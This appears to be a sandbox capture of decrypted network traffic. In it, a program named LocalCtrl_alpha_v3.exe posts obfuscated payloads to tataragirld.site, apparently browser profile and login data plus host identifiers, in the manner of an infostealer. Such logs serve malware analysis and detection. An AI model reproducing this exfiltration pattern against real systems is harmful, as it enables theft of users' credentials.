                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:14 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                15192.168.2.75007052.168.117.1714432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:15 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736252355418&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 9881
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:15 UTC9881OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 37 54 31 32 3a 31 39 3a 31 35 2e 34 31 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 61 37 37 38 62 34 2d 38 63 38 61 2d 34 38 33 35 2d 39 32 38 61 2d 35 30 33 39 66 34 38 35 31 61 37 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 35 38 35 36 31 39 31 38 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-07T12:19:15.416Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"f8a778b4-8c8a-4835-928a-5039f4851a73","epoch":"2585619185"},"app":{"loc
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:16 UTC889INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=1b55a92517b446dca56d2357f8595a4e&HASH=1b55&LV=202501&V=4&LU=1736252356013; Domain=.microsoft.com; Expires=Wed, 07 Jan 2026 12:19:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=b61e8dc463b246ff86cba4286f455021; Domain=.microsoft.com; Expires=Tue, 07 Jan 2025 12:49:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 595
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:15 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                16192.168.2.750088188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC504OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 131275
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC15331OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 48 aa 01 00 fb 04 46 13 88 00 00 00 08 00 00 00 14 00 03 03 f8 07 45 10 03 03 03 03 03 03 03 03 90 c3 93 91 9b c3 93 a5 40 6b 71 6c 6e 66 da 3b 40 39 5f 56 70 66 71 70 5f 65 71 6c 6d 77 67 66 70 68 5f 42 73 73 47 62 77 62 5f 4f 6c 60 62 6f 5f 44 6c 6c 64 6f 66 5f 40 6b 71 6c 6e 66 5f 56 70 66 71 23 47 62 77 62 92 9a c3 93 a4 47 66 65 62 76 6f 77 da 43 40 39 5f 56 70 66 71 70 5f 65 71 6c 6d 77 67 66 70 68 5f 42 73 73 47 62 77 62 5f 4f 6c 60 62 6f 5f 44 6c 6c 64 6f 66 5f 40 6b 71 6c 6e 66 5f 56 70 66 71 23 47 62 77 62 5f 47 66 65 62 76 6f 77 da 37 60 6b 71 6c 6e 6a 76 6e 5c 61 71 6c 74 70 66 71 70 5f 40 6b 71 6c 6e 66 5f 73 71 6c 65 6a 6f 66 70 5f 47 66 65 62 76 6f 77 5f 4f 6c 64 6a 6d 23 47 62 77 62
                                                                                                                                                                                                                                                                                                Data Ascii: HFE@kqlnf;@9_Vpfqp_eqlmwgfph_BssGbwb_Ol`bo_Dlldof_@kqlnf_Vpfq#GbwbGfebvowC@9_Vpfqp_eqlmwgfph_BssGbwb_Ol`bo_Dlldof_@kqlnf_Vpfq#Gbwb_Gfebvow7`kqlnjvn\aqltpfqp_@kqlnf_sqlejofp_Gfebvow_Oldjm#Gbwb
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC15331OUTData Raw: 6a 10 1d 25 a4 3b 42 06 89 31 39 de bc e7 cb a9 f2 9d 40 b5 09 c2 35 13 d0 79 58 58 6a 45 b1 69 a5 82 69 67 5b 59 8f 56 f3 f2 7a 28 e1 2a c9 75 e7 9d 61 ae 1a b5 af cb 5d aa 1f 1f 99 35 0c 71 5b 09 a9 db 6e e9 95 91 f0 4d 86 ce 55 a0 87 13 6f 92 fe 0e 82 82 9a 4b 95 47 17 32 5d 65 0e fb 57 d8 0c c5 35 eb 78 76 4a 96 6d 4a d6 2b c9 95 25 e2 61 79 6f df 0b d9 c2 fa 35 e5 fa 71 dc 92 a4 91 f5 12 28 f0 e2 67 02 a1 da 84 30 05 af 6b d6 c9 b3 b3 6c 10 09 8c 7d 05 c3 d8 48 79 9c 7d be 25 83 f4 2f b4 6c 82 48 3f b5 0c 13 2e 8b 8c 12 3d 2a c8 54 8a a7 d1 98 16 40 9b e2 90 f6 ad fe 07 43 14 65 a0 a6 84 f7 54 91 2a 0e d7 40 c5 85 41 fa b8 2d a1 8c be de 47 de eb 8f 7d 1a b5 1b ea a4 1a d4 f8 13 25 72 96 e6 8e b2 4a 12 f1 12 2b b3 b8 bd d3 f4 f1 2b 2a 6d 9a 35 5f 7a
                                                                                                                                                                                                                                                                                                Data Ascii: j%;B19@5yXXjEiig[YVz(*ua]5q[nMUoKG2]eW5xvJmJ+%ayo5q(g0kl}Hy}%/lH?.=*T@CeT*@A-G}%rJ++*m5_z
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC15331OUTData Raw: 60 ce d7 a2 55 bb 85 fa 87 e8 26 7f 6b 10 60 be f5 95 44 3b b6 49 6b b1 ae b4 46 5c 72 4e a2 4e dd 99 58 25 c3 3f 16 4b 46 9d e0 62 a4 02 e9 f0 e1 b7 8f 09 e6 85 f4 15 b5 2f c8 1e 75 79 fb 2e bd 0e 54 4c 39 95 36 62 0f b8 23 69 a2 99 49 78 c5 3f 76 ff 83 a4 09 2f 03 45 cb 77 38 a5 63 c9 02 16 f3 17 1f 57 a2 e1 bf f3 ee 31 ac 88 5d 63 17 dd 9d d9 c4 9c 40 17 b6 25 57 f2 79 45 30 af 4b 63 07 87 70 9b 67 a3 59 b4 d8 a3 5a 73 59 b4 7a 40 51 f2 48 08 47 68 95 f2 38 0b 2a bb c7 73 32 ba 6d e0 50 65 c6 d5 2e 0c 77 32 25 9c 08 1c 50 cd 32 3c 23 19 a8 02 10 cd 61 c5 45 4d ee c1 c3 45 b2 36 00 37 1a 66 21 0f 63 e7 65 b2 3a 29 2b a3 5b 7d 63 b0 08 ec 33 a3 9b 53 87 cf 3b 31 e4 b4 7a 3e a4 0a 0b 35 35 d1 09 9d 36 11 cb 6d 01 52 70 14 3c aa 13 27 57 63 3f e0 4b 60 24
                                                                                                                                                                                                                                                                                                Data Ascii: `U&k`D;IkF\rNNX%?KFb/uy.TL96b#iIx?v/Ew8cW1]c@%WyE0KcpgYZsYz@QHGh8*s2mPe.w2%P2<#aEME67f!ce:)+[}c3S;1z>556mRp<'Wc?K`$
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC15331OUTData Raw: be b4 ff c4 92 73 a1 23 77 80 21 ef 4a 01 bc e7 df 8f 25 92 e1 ff 4f c1 f5 02 ab d5 01 d3 4f 11 3e d1 2a a7 5e 6d 5d 21 27 5c 88 17 e4 78 03 9e bb 8f f7 23 55 d5 6a de 35 1f 05 4e e6 d4 89 8f 6e a7 f3 43 5f 5e a4 58 8f bb c9 5c e4 28 1c ee 83 73 d9 59 14 8b d6 08 7b d9 5b be 5e 83 4f 83 63 08 4f 03 05 b5 c3 0a 61 f6 05 01 31 52 90 3c 43 25 4b b3 06 fd bc e0 be ed 2a 01 ec 60 04 48 f9 55 bf 80 79 23 f1 96 47 ef 65 b7 db 92 64 55 90 94 c8 14 b6 fd 1a d9 fa 50 64 41 f7 a7 3d 45 09 81 21 be d7 bc 72 ca 2e 52 f1 85 02 9b 56 19 9c d5 5b 23 6b 54 a5 c5 33 e0 16 6f e4 b7 b8 45 74 7f d3 61 82 a3 22 4f 9b 09 5b 81 40 74 40 15 3e 7d bd e1 c4 12 11 b6 c1 65 d6 00 87 3f 04 c3 a5 82 6e 91 ad 5a 75 06 1c 90 11 a7 0e ef d2 d8 ca 2d d9 fc 40 a0 fc a2 32 3d a5 1f 36 96 d9
                                                                                                                                                                                                                                                                                                Data Ascii: s#w!J%OO>*^m]!'\x#Uj5NnC_^X\(sY{[^OcOa1R<C%K*`HUy#GedUPdA=E!r.RV[#kT3oEta"O[@t@>}e?nZu-@2=6
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC15331OUTData Raw: cf af 03 03 03 03 03 03 e6 71 03 03 03 03 03 03 b6 fe e4 8d ef bb 11 24 0d bd c9 a3 3d ee 41 56 9e f1 a5 83 5a af 7f 49 2a 2a 66 51 75 ec 1c 06 7a ec 5e 49 14 fe ed 08 57 9e 70 b9 b9 6c f4 9e 9a 36 e4 40 74 05 4e f3 14 c2 63 33 cb 11 ca 7c bc 87 d2 39 94 58 f9 12 25 52 d0 c4 76 39 7e a7 48 9b bc bf bc ff e8 06 85 2a 9d 46 33 93 27 5b 11 c1 13 97 25 4a 02 86 6b 0b 15 13 19 00 32 02 42 43 19 67 7b 8f 63 52 47 c3 5a 9d 82 2a 02 26 23 11 47 62 5d 63 52 e2 5c 2c 2c ac 2c 4a 39 d4 48 3c 7f b7 7e 91 bd bf fc f8 26 6d d1 73 f9 1b a5 37 98 3c f9 2d 4d 3c c1 62 6b c9 37 7a 7a 5c a5 36 7e 7e 2a e4 8c bd 78 7a cc c1 65 fd 4a 7e 47 c4 44 91 65 e2 d9 2f 7c 50 79 4d c0 2a 2d 3d f9 ad 3a fd 58 da dc 5c 5c 91 bd 0e c8 ed 20 8f 94 b1 ec e5 8c bb ec b1 31 7c 7a 7c ba a1 b0
                                                                                                                                                                                                                                                                                                Data Ascii: q$=AVZI**fQuz^IWpl6@tNc3|9X%Rv9~H*F3'[%Jk2BCg{cRGZ*&#Gb]cR\,,,J9H<~&ms7<-M<bk7zz\6~~*xzeJ~GDe/|PyM*-=:X\\ 1|z|
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC15331OUTData Raw: 1b cc 33 01 c2 81 0b 0a 30 01 4f 33 3b 29 f3 27 c7 23 1f 05 e0 07 04 71 0b 06 0a 37 c7 31 2b 41 f3 37 8d a1 1f cd 11 fc 66 87 fc 59 65 fe fd f9 d1 84 5e 5e 0c 66 37 87 7e 9e a4 72 15 d4 76 51 e4 62 1c 65 4e 50 0d e2 dc 75 e2 7c 9a 12 52 97 46 4a 85 e1 5a 8d 27 6b 95 e0 3b 11 00 06 89 a5 32 1d 61 2a 0d 26 1a 81 45 2b 91 e0 5a 0b e2 13 01 64 3a 1f e5 33 8f a0 3a 85 40 72 97 fd 64 bc 87 a0 17 fa d8 e4 67 4d 7d 4e 88 7e 12 d4 6a d5 77 46 99 7c 29 3e 1d a1 6f 8b c8 33 ca c8 39 ed 88 bc 88 f0 3d c0 87 7c 51 34 0d c2 0b c0 08 07 44 23 1b 81 a0 1b 4b e1 33 04 b0 2b 84 a1 17 8d 73 07 0f d1 37 0a 31 bb c3 c1 1f 8a 51 bb 83 62 17 c8 53 2f 27 73 3f 00 fd 70 cf 07 fd 05 fd 05 7e 3a a5 bd 89 99 2f cf a9 b5 2f e8 ab 4d 84 ad e8 98 22 8c a1 21 ae 89 25 2d 3c 94 3f 7c 36
                                                                                                                                                                                                                                                                                                Data Ascii: 30O3;)'#q71+A7fYe^^f7~rvQbeNPu|RFJZ'k;2a*&E+Zd:3:@rdgM}N~jwF|)>o39=|Q4D#K3+s71QbS/'s?p~://M"!%-<?|6
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC15331OUTData Raw: 30 3e 5d 7e d3 12 fd 52 44 29 4e 02 3c eb f0 9d a1 a7 27 94 f1 0c 2a a7 91 16 a0 99 e9 7d 74 b7 bd e9 6b 1a 91 e1 3e 36 dd 66 36 8e 7c cd d0 3d 97 1e 4c 23 56 b4 20 f9 3f 11 62 ad 52 a7 7c b9 62 58 17 53 21 25 18 5f 1e ca 2d fc 87 91 9b f8 1e ea 1c 8e 74 d7 a5 6b b7 42 b4 10 88 63 13 84 66 9f a0 18 28 96 45 6c 1a 9e 99 ad 93 8a 19 57 4f 8d d8 ea 36 20 21 6e d4 37 19 4f fd 33 44 4e e0 6f 78 f4 68 f8 b8 78 cd f8 56 24 8f 9c c8 ab ce 0c 39 b2 7c 47 02 6c c6 ca b3 0a 87 25 3d 69 c1 33 0d 67 48 bd a2 2f 46 52 43 0a a4 53 cb 7f 58 67 aa c6 a5 4f 48 4c cb 24 fa 3f 7c 1d d7 a2 4b 67 d7 e5 52 af 66 48 f9 5a 40 0e 4d c5 18 75 7d 47 7e fc 53 cb 8b c8 83 21 2e 58 91 85 44 b1 5c dc 7a bf ec e6 84 ce e7 8b 3b 3e 11 25 44 43 b2 30 b8 ed f6 fa 89 fe de 36 80 a6 d4 95 c2
                                                                                                                                                                                                                                                                                                Data Ascii: 0>]~RD)N<'*}tk>6f6|=L#V ?bR|bXS!%_-tkBcf(ElWO6 !n7O3DNoxhxV$9|Gl%=i3gH/FRCSXgOHL$?|KgRfHZ@Mu}G~S!.XD\z;>%DC06
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC15331OUTData Raw: 71 6c 6e 6a 76 6e 5c 61 71 6c 74 70 66 71 70 2c 46 67 64 66 2c 73 71 6c 65 6a 6f 66 70 2c 47 66 65 62 76 6f 77 2c 4f 6c 60 62 6f 23 50 77 6c 71 62 64 66 2c 6f 66 75 66 6f 67 61 2c 4e 42 4d 4a 45 46 50 57 2e 33 33 33 33 33 32 02 03 1b 03 2a 03 03 03 03 03 03 03 2d 03 03 03 03 03 03 03 19 63 02 03 03 03 03 03 53 48 02 01 2e 03 2e 03 03 0b 0b 03 0f 04 27 54 0c b6 e7 fb fc fc fc fc fc fc fc fc 26 03 1f 03 03 03 03 03 03 03 03 03 03 03 fc fc fc fc 60 6b 71 6c 6e 6a 76 6e 5c 61 71 6c 74 70 66 71 70 2c 40 6b 71 6c 6e 66 2c 4f 62 70 77 23 55 66 71 70 6a 6c 6d 02 03 1b 03 0d 03 03 03 03 03 03 03 10 03 03 03 03 03 03 03 64 c2 03 03 03 03 03 03 53 48 02 01 2e 03 2e 03 03 0b 0b 03 0f 04 27 54 4b 74 a2 d8 fc fc fc fc fc fc fc fc 32 03 1f 03 03 03 03 03 03 03 03 03 03
                                                                                                                                                                                                                                                                                                Data Ascii: qlnjvn\aqltpfqp,Fgdf,sqlejofp,Gfebvow,Ol`bo#Pwlqbdf,ofufoga,NBMJEFPW.333332*-cSH..'T&`kqlnjvn\aqltpfqp,@kqlnf,Obpw#UfqpjlmdSH..'TKt2
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:30 UTC8627OUTData Raw: dd 38 64 3d f0 cb 86 df 5f f2 ad f3 e0 62 bf 5f 7d 48 ee de af a6 78 79 2e 2e 8f cc 36 a9 cc d6 0d 9c 38 f7 ff aa 90 e0 4c ed be b0 7b c4 cc 2f e5 95 1d 1e bb 38 bf f5 8d 33 3d 3b 3b 5b 0d 20 e6 5d 58 e6 ee d8 59 6a e0 f2 6d 31 3c 36 1c d4 e9 de fa c4 95 e0 c5 68 72 e4 51 d1 59 7b 5c 34 9a 9c e9 b7 b9 ee ea fb b2 88 ae d5 a6 fa 69 f8 51 64 3f 6a b6 19 14 a8 ee 5d e1 77 76 7d a2 59 9c 6e 3d d5 8f ac 8f 74 38 72 b8 d0 8c 6d 36 90 bb 9a 3f 35 3d d8 6b 5e af 35 35 dd 45 71 a5 fa e7 c0 72 3f 70 fb cb e6 0c ef be f0 f2 04 fc f1 70 ba 8c e6 ec 09 64 dc 71 dc a4 58 ce a7 5e bc db 4e e1 4e 40 77 f9 c1 b6 04 ad 5f 5e 3f 5c be 73 f5 fa be 74 7d eb 68 ec fc b2 df fa c1 5e e2 fb 58 ad b8 79 b2 d6 4e 35 56 f8 e1 08 94 a8 24 3d 71 e9 9a 84 3d 35 fa ef dd 38 4c ce bc ff
                                                                                                                                                                                                                                                                                                Data Ascii: 8d=_b_}Hxy..68L{/83=;;[ ]XYjm1<6hrQY{\4iQd?j]wv}Yn=t8rm6?5=k^55Eqr?ppdqX^NN@w_^?\st}h^XyN5V$=q=58L
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:31 UTC849INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:31 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykLV4a65X7JyR1GVjy9QFiAEDoEjC7tVIfPuOMGNNtQS%2BMdDVqcifLfm%2FNWKHu3nOzuTWrji7aa%2F9t5uHct9xcLG%2FqrkMVW%2Bp50bthYNLmYfC%2BLn2fseL1PQSyudwBS3wLy4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e582992143aa-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1585&rtt_var=605&sent=48&recv=139&lost=0&retrans=0&sent_bytes=2840&recv_bytes=132789&delivery_rate=1793611&cwnd=241&unsent_bytes=0&cid=1503d2bd5b84093c&ts=786&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                17192.168.2.750089188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:31 UTC501OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 745
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:31 UTC745OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 6f d8 2a 27 88 00 00 00 08 00 00 00 00 03 03 03 6c db 29 24 03 03 03 03 03 03 03 03 91 c3 93 61 03 03 03 6c db 29 24 03 03 03 03 03 03 03 03 53 48 05 05 2f 03 03 03 03 03 03 03 2e 03 2e 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 53 48 05 04 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 53 48 06 05 03 03 03 03 fc fc fc fc fc fc fc fc fc fc fc fc 03 03 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 78 a6 e5 24 53 87 99 33 a7 00 00 00 a6 aa 95 35 88 00 00 00 08 00 00 00 16 03 03 03 a5 a9 96 36 03 03 03 03 03 03 03 03 91 c3 91 96 c3 01 02 a0 91 c3 03 a3 96 c3 02 02 a0 91 c3 03 a3 61 03 03 03 a5 a9 96 36 03 03
                                                                                                                                                                                                                                                                                                Data Ascii: o*'l)$al)$SH/..SHSHx$S356a6
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC840INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:31 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4BDjJLc%2F4Ovu3BiPEQJ1MtiyFYIYgNDhL4grQoHw%2FrkM%2F5wGUOHREqg9sfmkorSMtDNmJOUuKaDMZUHM%2BEGY3FOVCTC2yLuOQXERHv7H1SyhxbkrwGrqIN7OLzjtEUulout"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e58b7df09e08-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2030&rtt_var=770&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1882&delivery_rate=1411992&cwnd=163&unsent_bytes=0&cid=c194d8876d129e74&ts=310&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                18192.168.2.750090188.114.97.34435440C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC391OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                Content-Length: 147
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC147OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 8f 02 20 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd $9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:32 UTC858INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:32 GMT
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
